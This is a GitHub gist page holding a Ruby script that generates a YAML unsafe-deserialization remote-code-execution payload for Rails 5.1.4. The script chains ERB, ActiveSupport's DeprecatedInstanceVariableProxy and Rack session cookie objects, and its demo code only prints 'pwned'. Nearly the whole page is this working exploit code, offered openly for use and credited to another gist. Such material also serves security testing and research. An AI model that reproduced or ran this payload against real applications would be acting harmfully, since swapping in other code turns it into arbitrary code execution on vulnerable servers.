-
-
Save pich4ya/ff23e134cf10b08da93062a533a47b4b to your computer and use it in GitHub Desktop.
Rails 5.1.4 YAML unsafe deserialization RCE payload, full credit to: https://gist.github.com/500646/5a0add1a0301492714342ba82b1d3aee
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# https://gist.github.com/500646/5a0add1a0301492714342ba82b1d3aee | |
require 'yaml' | |
require 'base64' | |
require 'erb' | |
class ActiveSupport | |
class Deprecation | |
def initialize() | |
@silenced = true | |
end | |
class DeprecatedInstanceVariableProxy | |
def initialize(instance, method) | |
@instance = instance | |
@method = method | |
@deprecator = ActiveSupport::Deprecation.new | |
end | |
end | |
end | |
end | |
code = <<-EOS | |
puts "pwned" | |
EOS | |
erb = ERB.allocate | |
erb.instance_variable_set :@src, code | |
erb.instance_variable_set :@lineno, 1337 | |
depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new erb, :result | |
payload = Base64.encode64(Marshal.dump(depr)).gsub("\n", "") | |
payload = <<-PAYLOAD | |
--- | |
!ruby/object:Gem::Requirement | |
requirements: | |
!ruby/object:Rack::Session::Abstract::SessionHash | |
req: !ruby/object:Rack::Request | |
env: | |
"rack.session": !ruby/object:Rack::Session::Abstract::SessionHash | |
id: 'hi from espr' | |
HTTP_COOKIE: "a=#{payload}" | |
store: !ruby/object:Rack::Session::Cookie | |
coder: !ruby/object:Rack::Session::Cookie::Base64::Marshal {} | |
key: a | |
secrets: [] | |
exists: true | |
loaded: false | |
PAYLOAD | |
puts payload |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment